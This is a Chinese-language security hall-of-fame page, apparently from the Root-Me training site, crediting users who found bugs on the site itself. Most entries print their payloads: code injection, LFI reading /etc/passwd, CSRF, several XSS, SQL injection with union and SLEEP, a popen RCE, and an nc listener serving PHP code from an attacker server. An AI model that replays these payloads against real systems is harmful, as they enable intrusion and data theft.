黑客

与任何信息系统一样,在网站上也发现了一些不足之处。

 [02/12/2009]real发现一个代码注入漏洞。

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd')'。

 [02/02/2011] hello在PM系统中发现几个存储的XSS。

<script>[代码javascript/vbscript]</script>

 [15/02/2011]EsSandre发现一个LFI :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

 [30/06/2011] elyfean在聊天框上发现一个CSRF。

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

 [11/07/2011] Armel在聊天框上发现了一个存储的XSS。

&lt;iframe src="javascript:[code javascript]' /&gt;
&lt;/code&gt;

 [18/07/2011]g0uZ在 "在线工具:nmap "上发现一个PHP代码注入漏洞

主机在-sV模式下进行扫描。

--版本跟踪 --p8888 [IP服务器攻击者]

在攻击者服务器上监听的服务

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done
</?php>

 [02/10/2011]Hypnoze发现了一个不安全的间接对象引用,它导致了对所有PM的未授权访问。

http://www.root-me.org/spip.php?page=messagerie&amp;id=write&amp;repondre=[id_message_to_read]

 [23/10/2011]courte66在 "encode - decode "页面发现了一个反射式XSS。

要用base64解码的文本

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

 [2012年3月20日]jimee在一个挑战中发现了一个LFI。

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

 [06/11/2012]jimee在用户配置文件管理中发现了几个存储的XSS。

<script>[代码javascript/vbscript]</script>

 [15/05/2020]Laluka确定了多个漏洞:3个反射型XSS,2个SQLi和1个RCE。

https://www.root-me.org/ecrire/?exec=plan&amp;null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&amp;id_article=1&amp;_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&amp;var_profile=pouet'/&gt;<script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&amp;lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&amp;where[]=(SELECT%20SLEEP(5)=1); --+-
https://www.root-me.org/ecrire/?exec=article&amp;id_article=1&amp;ajouter=non&amp;tri_liste_aut=statut&amp;deplacer=oui&amp;_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

 Podalirius发现了一个允许不受限制地访问解决方案所附文件的漏洞。

<imgXX>